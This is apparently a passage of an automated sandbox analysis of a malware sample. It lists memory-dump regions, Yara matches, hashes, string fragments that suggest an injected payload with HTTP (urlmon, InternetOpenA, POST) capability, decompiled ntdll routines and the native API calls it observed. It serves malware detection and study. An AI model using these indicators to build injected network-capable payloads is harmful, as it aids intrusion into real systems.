                                                        • Opcode ID: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                                        • Instruction ID: 3f179ec13a9d5479e876bb658ceab0561faef8866cb6c9f7102c5756b71e6d24
                                                        • Opcode Fuzzy Hash: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                                        • Instruction Fuzzy Hash: 3431737195031C6BEB21DBA4DC42FEE777DEF48700F404199F509AA182EFB16B848BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$FBIMG$FBIMG$g$i$p
                                                        • API String ID: 0-1737736949
                                                        • Opcode ID: 7200807fb254a1370332410a00b877fe38e396150b2652f270615f3e51ddcd7b
                                                        • Instruction ID: 4b14ee3bd47ac5823d113e9211295dd9f77b013281d62dea4dedf0c6f31d7f46
                                                        • Opcode Fuzzy Hash: 7200807fb254a1370332410a00b877fe38e396150b2652f270615f3e51ddcd7b
                                                        • Instruction Fuzzy Hash: 9B316D75940208ABDB50EFA4D841FEF77F9FF89700F04441AFA19AB281D7B559448BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$FBIMG$FBIMG$g$i$p
                                                        • API String ID: 0-1737736949
                                                        • Opcode ID: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                                        • Instruction ID: c89a7489b7229e937f9145b7d6cf5ab667a9e97dc11209843187974f7850fc71
                                                        • Opcode Fuzzy Hash: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                                        • Instruction Fuzzy Hash: 87318F71900308ABDB50DFA4D841FEFB7F9FF89700F04441AE918AB281D7B56944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                        • API String ID: 0-3155091674
                                                        • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                        • Instruction ID: 487ef5eaff419ddfd9c07d4d7f19f4e027a2de09f168cb7f9a9a2a7815e9a27c
                                                        • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                        • Instruction Fuzzy Hash: DAF019B2A01118AF9B14DF98DC419FBB7BCEF48310B048689BE1897301D635AE508BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                        • API String ID: 0-3155091674
                                                        • Opcode ID: ddd81a3a0578cbdbb02d01a3313964d737a9816d535c767ab431dd0820f437ff
                                                        • Instruction ID: 40be9d8f21ba619cf90467dd08e2da3e577aad656a7a68c9394033326065fce6
                                                        • Opcode Fuzzy Hash: ddd81a3a0578cbdbb02d01a3313964d737a9816d535c767ab431dd0820f437ff
                                                        • Instruction Fuzzy Hash: 62F01DB2A01119AF8B14DF98D9419FF7BB9EF45300B148149BE5897302D670AE518BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                                        • API String ID: 0-314038199
                                                        • Opcode ID: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                                        • Instruction ID: cea4296da33ef3231e7594cd6021ad55c8750b73977f43a578c9210ceba432b2
                                                        • Opcode Fuzzy Hash: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                                        • Instruction Fuzzy Hash: 7B519671A40209BBEB20DF54DC82FFE77B8EB45704F144059FE086B282E774AA51CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: */*$POST$POST$Windows Expl$rer
                                                        • API String ID: 0-1278404498
                                                        • Opcode ID: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                                        • Instruction ID: 56e7d3525ec65294be83e29fb4303fb5ee486fea62caecccff371cfc17dbcac6
                                                        • Opcode Fuzzy Hash: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                                        • Instruction Fuzzy Hash: C95174B1D00249BFEB11DFA4DC42FEE77B8AF45304F044159F509AB282E7705A54CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4$dll$ion.$ion.dll$vers
                                                        • API String ID: 0-4275468499
                                                        • Opcode ID: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                                        • Instruction ID: 14066517e324c4e6b0f8dbffa91e207f03f87ab154bb210309073fd6bebb9fc9
                                                        • Opcode Fuzzy Hash: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                                        • Instruction Fuzzy Hash: 48418F72900219ABDF20DFE5CC81FEFB7BCEF45740F044159F918AA181DA71AA14DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$a$b$d$i
                                                        • API String ID: 0-2334916691
                                                        • Opcode ID: f95e0e6f3ba57f508010e39c55bf9e06b052d0110034ba8ed36beb66b15d6d1e
                                                        • Instruction ID: cd5ea9d5231370619e8d05d30554830bf9f7f80c0d91831f35b625ca471b3b66
                                                        • Opcode Fuzzy Hash: f95e0e6f3ba57f508010e39c55bf9e06b052d0110034ba8ed36beb66b15d6d1e
                                                        • Instruction Fuzzy Hash: 96317FB5900308ABDB10EFA0DC85FEEB7B9EF45704F00851DF519A7242EBB4690587A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                                        • API String ID: 0-314038199
                                                        • Opcode ID: 96f24b9a5646ff5127bb2da5d61196845184b27f665757bff7c49a9122a3f91a
                                                        • Instruction ID: e36a32d6fb0068e115bcefc898b0128ce5a8b6b025a427e50bde9d91d95f936a
                                                        • Opcode Fuzzy Hash: 96f24b9a5646ff5127bb2da5d61196845184b27f665757bff7c49a9122a3f91a
                                                        • Instruction Fuzzy Hash: 1B319371A41219BBEB21DF518C82FEE7BB8AB45B04F144155F6087F2C2D7B0AA11CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Us$: $er-A$gent$urlmon.dll
                                                        • API String ID: 0-1367105278
                                                        • Opcode ID: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                                        • Instruction ID: a0f52c4d66b4a28058ad033c43f4722de5ccef2c5dfdc7c6da1c64c43ddf6f80
                                                        • Opcode Fuzzy Hash: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                                        • Instruction Fuzzy Hash: 66118EB1E01219AADB00DE959C02BEEBBB8AB45714F000059EC04AA241E2B45B0187E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Us$: $er-A$gent$urlmon.dll
                                                        • API String ID: 0-1367105278
                                                        • Opcode ID: 97d27832f28f549c3455fada48f2fae123f7f02aa03623e7613e097dd745b1b3
                                                        • Instruction ID: 50463f5a4f19b6be9471316e404fdba67e6ad86e119f6b5e1fa5c8d4d0604045
                                                        • Opcode Fuzzy Hash: 97d27832f28f549c3455fada48f2fae123f7f02aa03623e7613e097dd745b1b3
                                                        • Instruction Fuzzy Hash: FF118CB1D01219AAEB00DF95CD02BFFBBB8EF45B44F100059F904BA281D3B45B018BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 26%
                                                        			E1E29645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				void* _v36;
                                                        				intOrPtr _v48;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v56;
                                                        				char _v60;
                                                        				char _v64;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v72;
                                                        				intOrPtr _v76;
                                                        				intOrPtr _v80;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr _t48;
                                                        				intOrPtr _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr* _t52;
                                                        				char _t56;
                                                        				void* _t69;
                                                        				char _t72;
                                                        				void* _t73;
                                                        				intOrPtr _t75;
                                                        				intOrPtr _t79;
                                                        				void* _t82;
                                                        				void* _t84;
                                                        				intOrPtr _t86;
                                                        				void* _t88;
                                                        				signed int _t90;
                                                        				signed int _t92;
                                                        				signed int _t93;
                                                        
                                                        				_t80 = __edx;
                                                        				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                        				_v8 =  *0x1e35d360 ^ _t92;
                                                        				_t72 = 0;
                                                        				_v72 = __edx;
                                                        				_t82 = __ecx;
                                                        				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                        				_v68 = _t86;
                                                        				E1E2AFA60( &_v60, 0, 0x30);
                                                        				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                        				_t93 = _t92 + 0xc;
                                                        				_v76 = _t48;
                                                        				_t49 = _t48;
                                                        				if(_t49 == 0) {
                                                        					_push(5);
                                                        					 *((char*)(_t82 + 0x6a)) = 0;
                                                        					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                        					goto L3;
                                                        				} else {
                                                        					_t69 = _t49 - 1;
                                                        					if(_t69 != 0) {
                                                        						if(_t69 == 1) {
                                                        							_push(0xa);
                                                        							goto L3;
                                                        						} else {
                                                        							_t56 = 0;
                                                        						}
                                                        					} else {
                                                        						_push(4);
                                                        						L3:
                                                        						_pop(_t50);
                                                        						_v80 = _t50;
                                                        						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                        							E1E282280(_t50, _t86 + 0x1c);
                                                        							_t79 = _v72;
                                                        							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                        							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                        							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                        							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                        							E1E27FFB0(_t72, _t82, _t86 + 0x1c);
                                                        						}
                                                        						_t75 = _v80;
                                                        						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                        						_t80 =  *_t52;
                                                        						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                        						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                        						_v60 = 0x30;
                                                        						_v56 = _t75;
                                                        						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                        						asm("movsd");
                                                        						_v76 = _t80;
                                                        						_v64 = 0x30;
                                                        						asm("movsd");
                                                        						asm("movsd");
                                                        						asm("movsd");
                                                        						if(_t80 != 0) {
                                                        							 *0x1e35b1e0(_t75, _v72,  &_v64,  &_v60);
                                                        							_t72 = _v76();
                                                        						}
                                                        						_t56 = _t72;
                                                        					}
                                                        				}
                                                        				_pop(_t84);
                                                        				_pop(_t88);
                                                        				_pop(_t73);
                                                        				return E1E2AB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                        			}

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 05ed384b3a916d41095e36b3d20a9e0985a9124636ae2666fb405762d4772b0c
                                                        • Instruction ID: c8fe4bb56b7c6dc6b939153388bd09f95936cebb4e2909e580bf9ae6a09722a4
                                                        • Opcode Fuzzy Hash: 05ed384b3a916d41095e36b3d20a9e0985a9124636ae2666fb405762d4772b0c
                                                        • Instruction Fuzzy Hash: 87418AB56087529FC310CF28C494A5ABBE5FF88704F104A2EF988DB340D735EA49CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E1E2FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                        				void* _t7;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t10;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr _t14;
                                                        				intOrPtr* _t15;
                                                        
                                                        				_t13 = __edx;
                                                        				_push(_a4);
                                                        				_t14 =  *[fs:0x18];
                                                        				_t15 = _t12;
                                                        				_t7 = E1E2ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                        				_push(_t13);
                                                        				E1E2F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                        				_t9 =  *_t15;
                                                        				if(_t9 == 0xffffffff) {
                                                        					_t10 = 0;
                                                        				} else {
                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                        				}
                                                        				_push(_t10);
                                                        				_push(_t15);
                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                        				return E1E2F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                        			}

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E2FFDFA
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E2FFE2B
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E2FFE01
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: afb729e34e4f9bee8baf3c444a9076fc85c4526f083e5f1c171b26012ca7651d
                                                        • Instruction ID: a7063f2504929264aad1ea60fd4e7f283e376b6290dc56ae88b44ef0137f8fa2
                                                        • Opcode Fuzzy Hash: afb729e34e4f9bee8baf3c444a9076fc85c4526f083e5f1c171b26012ca7651d
                                                        • Instruction Fuzzy Hash: DEF0F63B540141BFE6244A45DD11F67BF6AEB45730F240314F628566D1EA62FC6086F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$D$\$x
                                                        • API String ID: 0-3596669699
                                                        • Opcode ID: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                                        • Instruction ID: 739137aed9e153a8dd63ad3801ef6912ea5c01f18674833e289cdfc0787ce47a
                                                        • Opcode Fuzzy Hash: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                                        • Instruction Fuzzy Hash: 8151A7B19502187AE750DF949C42FFF73ACDF89314F004159FA09A6182EBF56A44CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P$r$s$w
                                                        • API String ID: 0-3891800351
                                                        • Opcode ID: 982cdfea5464a7ea42907472e98b8abec65724c6adcd49b3353d2e31fdaab00a
                                                        • Instruction ID: db5aab7c5a79df559f92c0e6f3305c240771f79712d7af5e65962346ba5176fb
                                                        • Opcode Fuzzy Hash: 982cdfea5464a7ea42907472e98b8abec65724c6adcd49b3353d2e31fdaab00a
                                                        • Instruction Fuzzy Hash: 555132B5D00208AFDB50DFA4C881BEEBBF5EF48710F24456DE919EB242E7749A04CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -$A$I$M
                                                        • API String ID: 0-1664541526
                                                        • Opcode ID: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                                        • Instruction ID: d686c0815dad119842ccbef62b661499c358b0408bcdce50622aafbe2d8bc8bc
                                                        • Opcode Fuzzy Hash: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                                        • Instruction Fuzzy Hash: 3EF08975D0021CBBEB10DA94AC45BFD7BECEB04318F4041A6FD08A6242E7F15E5887D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02454B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02454B87,007A002E,00000000,00000060,00000000,00000000), ref: 02459D8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 331baeac137bff5aa9f04c447d50184ed81edd3f1126455ff29ba6e4cd96d47a
                                                        • Instruction ID: a5aed55b85b42897ae8baab0533e106e9c9c6dad09520f89f9028952e297f676
                                                        • Opcode Fuzzy Hash: 331baeac137bff5aa9f04c447d50184ed81edd3f1126455ff29ba6e4cd96d47a
                                                        • Instruction Fuzzy Hash: DB0180B5200148ABCB08CF98D984CE777ADFF8C714B14874EFD5D87201C635E8558BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02454B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02454B87,007A002E,00000000,00000060,00000000,00000000), ref: 02459D8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 44fdf471e990adcdd8dac71b0b8fd6182ffe86301801bec4428b4e8414ef8946
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: C9F0BDB2200218ABCB08CF89DC84EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(02454D42,5EB6522D,FFFFFFFF,02454A01,?,?,02454D42,?,02454A01,FFFFFFFF,5EB6522D,02454D42,?,00000000), ref: 02459E35
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileRead
                                                        • String ID:
                                                        • API String ID: 752142053-0
                                                        • Opcode ID: 2c757cb87de35fde1d599b3cba0ad61d74998fdb3d1e035843da671c9cb999f3
                                                        • Instruction ID: e60144c092cdf0e265a2c3c27e48ce3c410918cab0f2cf29dea7241ae347d9de
                                                        • Opcode Fuzzy Hash: 2c757cb87de35fde1d599b3cba0ad61d74998fdb3d1e035843da671c9cb999f3
                                                        • Instruction Fuzzy Hash: 8D01F672205154AFDB14DF99DC84DAB7BA9EF8C320B148989FA9C8B241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(02454D42,5EB6522D,FFFFFFFF,02454A01,?,?,02454D42,?,02454A01,FFFFFFFF,5EB6522D,02454D42,?,00000000), ref: 02459E35
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: 20edc4257254ae4a9a2d5c29f60318fcbdf1c3d65554fd266961b72d7a2b67ef
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: 7FF0A4B2200218ABCB14DF89DC80EEB77ADAF8C754F158649BE5D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02442D11,00002000,00003000,00000004), ref: 02459F59
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 7b47bc396b877d74e85339fc7e7217a4f0b6ed5df04105bd6a21854bb6658c01
                                                        • Instruction ID: 66eb74a23769c232b760559b45120bcfa710cc1092033f0eadbedc19b9444b3c
                                                        • Opcode Fuzzy Hash: 7b47bc396b877d74e85339fc7e7217a4f0b6ed5df04105bd6a21854bb6658c01
                                                        • Instruction Fuzzy Hash: 8FF030B51101596BCB15DFA9DC84CE777A9FF88210B15875EFD8D97203C634D815CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02442D11,00002000,00003000,00000004), ref: 02459F59
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: 608ddeafd5f463e2357f4a6b05d6e739037a95b82758897f5b065a67b3c863a2
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: B8F015B2200218ABCB14DF89CC80EAB77ADAF88750F118649BE4897241C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 35b9d6603f99eef8a9160e374fea70635cf6070ed04f56b9c1342d2151bcca84
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: DAD01776200224ABD710EB99CC85EA77BADEF48760F154599BA589B242C530FA008AE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 3c78ceb43e6cdc76ac1166f8372471bd331b1f97073699544e84645fbf8259dd
                                                        • Instruction ID: 515fa3320c8aff51f6dfec119b87702129f9bccc757ba6a908846f676c804a77
                                                        • Opcode Fuzzy Hash: 3c78ceb43e6cdc76ac1166f8372471bd331b1f97073699544e84645fbf8259dd
                                                        • Instruction Fuzzy Hash: 57C08C731042004EC7009B9898808D27320DAC1214315C897E89C8B202E1308B108A90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                                        • Instruction ID: 6a8bc3fa82da60a46a530cd8c61adac4d2e5fffee8925ef34a687d7ece8f0d05
                                                        • Opcode Fuzzy Hash: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                                        • Instruction Fuzzy Hash: FC9002A1A43041527945B159840490B4006A7F0285791C017E1405954C866AE856E661
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                                        • Instruction ID: 62435d70b98f836dcf80fd804676ff570e555444756513dab108fe2608a17c5a
                                                        • Opcode Fuzzy Hash: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                                        • Instruction Fuzzy Hash: 879002B1A0200413F51171598504B0B000997E0285F91C417E041555CD979AD952B161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

